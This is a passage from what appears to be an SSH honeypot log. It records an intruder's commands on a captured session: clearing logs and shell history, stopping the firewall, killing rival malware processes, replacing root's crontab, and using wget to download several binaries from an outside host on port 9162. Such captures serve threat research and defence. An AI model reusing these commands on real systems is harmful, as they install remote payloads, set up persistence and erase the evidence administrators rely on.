  713. cd /var/log > anaconda.log
  714. cd /var/log > yum.log
  715. cd /var/log > secure
  716. cd /var/log > wtmp
  717. cd /var/log > utmp
  718. cd /var/log > messages
  719. cd /var/log > spooler
  720. cd /var/log > sudolog
  721. cd /var/log > aculog
  722. cd /var/log > access-log
  723. cd /root > .bash_history
  724. history -c"
  725. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
  726. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  727. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  728. apt-get -y install wget
  729. yum -y install wget
  730. chmod 7777 / etc
  731. killall -9 .IptabLes
  732. killall -9 nfsd4
  733. killall -9 profild.key
  734. cd /etc;rm -rf dir fake.cfg
  735. killall -9 nfsd
  736. killall -9 DDosl
  737. killall -9 lengchao32
  738. killall -9 b26
  739. killall -9 khelper
  740. killall -9 Bill
  741. killall -9 n26
  742. killall -9 007
  743. killall -9 codelove
  744. killall -9 32
  745. killall -9 m32
  746. killall -9 m64
  747. killall -9 64
  748. killall -9 83BOT
  749. killall -9 82BOT
  750. killall -9 dos64
  751. killall -9 dos32
  752. killall -9 new6
  753. killall -9 new4
  754. killall -9 node24
  755. killall -9 mimi
  756. killall -9 nodeJR-1
  757. killall -9 freeBSD
  758. killall -9 ksapdd
  759. killall -9 106
  760. killall -9 09
  761. killall -9 xsw
  762. killall -9 syslogd
  763. killall -9 skysapdd
  764. killall -9 cupsddd
  765. killall -9 ksapd
  766. killall -9 atddd
  767. killall -9 xfsdxd
  768. killall -9 sfewfesfs
  769. killall -9 gfhjrtfyhuf
  770. killall -9 rewgtf3er4t
  771. killall -9 fdsfsfvff
  772. killall -9 smarvtd
  773. killall -9 whitptabil
  774. killall -9 gdmorpen
  775. cd /etc;chattr -i 66
  776. cd /root; chmod 7777 / etc
  777. killall -9 minerd
  778. killall -9 syn
  779. killall -9 joudckfr
  780. killall -9 www
  781. killall -9 log
  782. killall -9 .IptabLes
  783. killall -9 .IptabLex
  784. killall -9 .Mm2
  785. killall -9 acpid
  786. killall -9 m64
  787. killall -9 ./QQ
  788. killall -9 aabb
  789. killall -9 g3
  790. killall -9 S99local
  791. killall -9 3
  792. killall -9 pm
  793. killall -9 qweasd
  794. killall -9 tangtang
  795. killall -9 imap-login
  796. killall -9 xudp
  797. killall -9 sshpa
  798. killall -9 008
  799. killall -9 txma
  800. killall -9 mrdos64.b00
  801. killall -9 mrdos32.b00
  802. killall -9 kkpklp
  803. killall -9 kiilp
  804. killall -9 xin1
  805. killall -9 jibateng
  806. killall -9 syscore.sh
  807. killall -9 syscore.sh
  808. killall -9 syscore.sh
  809. killall -9 .mimeo
  810. killall -9 .mimeo
  811. killall -9 .mimeo
  812. killall -9 .mimeop
  813. killall -9 .task1
  814. killall -9 .mimeop
  815. killall -9 .IptabLes
  816. killall -9 .IptabLex
  817. killall -9 .IptabLes
  818. killall -9 .IptabLex
  819. killall -9 .IptabLes
  820. killall -9 .IptabLex
  821. killall -9 .IptabLes
  822. killall -9 .IptabLex
  823. cd /root;rm -rf dir nohup.out
  824. cd /etc;rm -rf dir fake.cfg
  825. cd /etc;rm -rf dir cupsddd.*
  826. cd /etc;rm -rf dir atddd.*
  827. cd /etc;rm -rf dir ksapdd.*
  828. cd /etc;rm -rf dir kysapdd.*
  829. cd /etc;rm -rf dir sksapdd.*
  830. cd /etc;rm -rf dir skysapdd.*
  831. cd /etc;rm -rf dir xfsdxd.*
  832. cd /etc;rm -rf dir fake.cfg
  833. cd /etc;rm -rf dir cupsdd.*
  834. cd /etc;rm -rf dir atdd.*
  835. cd /etc;rm -rf dir ksapd.*
  836. cd /etc;rm -rf dir kysapd.*
  837. cd /etc;rm -rf dir sksapd.*
  838. cd /etc;rm -rf dir skysapd.*
  839. cd /etc;rm -rf dir xfsdx.*
  840. cd /etc;rm -rf dir sfewfesfs
  841. cd /etc;rm -rf dir gfhjrtfyhuf
  842. cd /etc;rm -rf dir rewgtf3er4t
  843. cd /etc;rm -rf dir fdsfsfvff
  844. cd /etc;rm -rf dir smarvtd
  845. cd /etc;rm -rf dir whitptabil
  846. cd /etc;rm -rf dir gdmorpen
  847. cd /etc;rm -rf dir sfewfesfs.*
  848. cd /etc;rm -rf dir gfhjrtfyhuf.*
  849. cd /etc;rm -rf dir rewgtf3er4t.*
  850. cd /etc;rm -rf dir fdsfsfvff.*
  851. cd /etc;rm -rf dir smarvtd.*
  852. cd /etc;rm -rf dir whitptabil.*
  853. cd /etc;rm -rf dir gdmorpen.*
  854. cd /etc;rm -rf dir nhgbhhj.*
  855. cd /tmp;rm -rf dir 1.*
  856. cd /tmp;rm -rf dir 2.*
  857. cd /tmp;rm -rf dir 3.*
  858. cd /tmp;rm -rf dir 4.*
  859. cd /tmp;rm -rf dir 5.*
  860. cd /tmp;rm -rf dir jdhe
  861. cd /tmp;rm -rf dir jdhe.*
  862. cd /var/spool/cron; rm -rf dir root.*
  863. cd /var/spool/cron; rm -rf dir root
  864. cd /var/spool/cron/crontabs; rm -rf dir root.*
  865. cd /var/spool/cron/crontabs; rm -rf dir root
  866. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  867. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  868. yes|mv /tmp/root /var/spool/cron
  869. yes|mv /tmp/root /var/spool/cron/crontabs
  870. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  871. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  872. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  873. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  874. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  875. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  876. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  877. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  878. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj